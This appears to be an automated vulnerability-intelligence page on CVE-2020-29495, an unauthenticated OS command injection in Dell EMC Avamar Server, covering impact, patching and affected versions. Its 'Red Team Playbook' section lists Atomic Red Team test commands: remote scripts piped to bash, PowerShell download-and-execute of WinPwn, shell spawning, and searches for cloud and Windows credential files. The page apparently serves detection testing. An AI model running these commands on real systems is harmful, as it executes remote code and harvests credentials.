CVE-2020-29495
Overview
This vulnerability is an OS command injection flaw rooted in improper input validation within the Fitness Analyzer component of Dell EMC Avamar Server versions 19.1, 19.2, and 19.3. The affected functionality fails to sanitize user-supplied input before executing system-level commands, allowing injection of arbitrary OS commands. The flaw arises from insecure handling of command parameters in the server application, enabling execution context escalation to high-privilege operating system commands.
Vulnerability Description
DELL EMC Avamar Server, versions 19.1, 19.2, 19.3, contain an OS Command Injection Vulnerability in Fitness Analyzer. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS with high privileges. This vulnerability is considered critical as it can be leveraged to completely compromise the vulnerable application as well as the underlying operating system. Dell recommends customers to upgrade at the earliest opportunity.
Impact
An unauthenticated remote attacker can execute arbitrary OS commands with high privileges on the affected Dell EMC Avamar Server and Integrated Data Protection Appliance versions. This enables full compromise of the application and underlying operating system, including potential data theft, service disruption, and lateral movement within the network. The vulnerability requires no authentication (PR:N) and no user interaction (UI:N), with network attack vector (AV:N), making exploitation straightforward and impactful as reflected by the CVSS 10.0 score.
Solution
Dell recommends immediate upgrading of EMC Avamar Server to versions beyond 19.3 and Integrated Data Protection Appliance beyond version 2.6 as detailed in advisory DSA-2020-272 (https://www.dell.com/support/kbdoc/en-us/000181806/dsa-2020-272-dell-emc-avamar-server-security-update-for-multiple-vulnerabilities). Customers should apply the provided security updates promptly to remediate the command injection vulnerability. No workarounds are specified; patching is the definitive mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The OS Command Injection vulnerability present in specific versions of DELL EMC Avamar Server and Integrated Data Protection Appliance poses a significant risk to organizations utilizing these products. This flaw allows an unauthenticated remote attacker to execute arbitrary operating system commands with elevated privileges. The root cause lies in the Fitness Analyzer component, which fails to properly sanitize user inputs. As a result, attackers can manipulate input parameters to inject malicious commands that the underlying operating system will execute. This vulnerability is particularly concerning due to its high severity rating, indicating that successful exploitation can lead to a complete compromise of both the application and the host operating system.
Attack vectors for this vulnerability are diverse and can be executed remotely, making it particularly dangerous. An attacker could leverage social engineering techniques to lure a user into interacting with a maliciously crafted request or exploit an exposed API endpoint. Once the attacker has access to the Fitness Analyzer, they can inject commands that may allow them to read sensitive data, alter system configurations, or even install additional malicious software. Scenarios could range from data exfiltration to the establishment of persistent backdoors, enabling ongoing access to the compromised environment. The potential for widespread impact is amplified by the fact that many organizations rely on these data protection solutions for critical backup and recovery operations.
The real-world implications of this vulnerability are profound. Organizations that fail to address this flaw risk significant business disruption, data loss, and reputational damage. The ability for an attacker to execute arbitrary commands can lead to unauthorized access to sensitive data, including customer information and proprietary business data. Furthermore, the financial repercussions of a breach can be substantial, involving costs related to incident response, regulatory fines, and potential litigation. The critical nature of the affected products means that many enterprises could be vulnerable, particularly those in sectors such as finance, healthcare, and government, where data integrity and confidentiality are paramount.
To detect and mitigate this vulnerability, organizations should prioritize immediate patching of the affected versions of DELL EMC Avamar Server and Integrated Data Protection Appliance. Regularly updating software and applying security patches is a fundamental aspect of a robust cybersecurity posture. Additionally, implementing intrusion detection systems (IDS) can help identify unusual patterns of behavior that may indicate exploitation attempts. Organizations should also conduct thorough security audits and vulnerability assessments to identify and remediate any additional weaknesses in their systems. Educating employees about the risks associated with command injection attacks and promoting best practices for input validation can further strengthen defenses against such vulnerabilities.
In conclusion, the OS Command Injection vulnerability in DELL EMC Avamar Server and Integrated Data Protection Appliance represents a critical threat that organizations must address promptly. The potential for remote exploitation and the severe consequences of a successful attack necessitate immediate action. By adopting a proactive approach to security, including timely updates, continuous monitoring, and employee training, organizations can significantly reduce their risk exposure and safeguard their critical data assets.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dell | Emc Avamar Server | 19.1 |
cpe:2.3:a:dell:emc_avamar_server:19.1:*:*:*:*:*:*:*
|
|
|
Dell | Emc Avamar Server | 19.2 |
cpe:2.3:a:dell:emc_avamar_server:19.2:*:*:*:*:*:*:*
|
|
|
Dell | Emc Avamar Server | 19.3 |
cpe:2.3:a:dell:emc_avamar_server:19.3:*:*:*:*:*:*:*
|
|
|
Dell | Emc Integrated Data Protection Appliance | 2.5 |
cpe:2.3:a:dell:emc_integrated_data_protection_appliance:2.5:*:*:*:*:*:*:*
|
|
|
Dell | Emc Integrated Data Protection Appliance | 2.6 |
cpe:2.3:a:dell:emc_integrated_data_protection_appliance:2.6:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-29495 |
| dell.com |
GitHub CVE
x_refsource_MISC
|
https://www.dell.com/support/kbdoc/en-us/000181806/dsa-2020-272-dell-emc-avamar-server-security-update-for-multiple-vulnerabilities |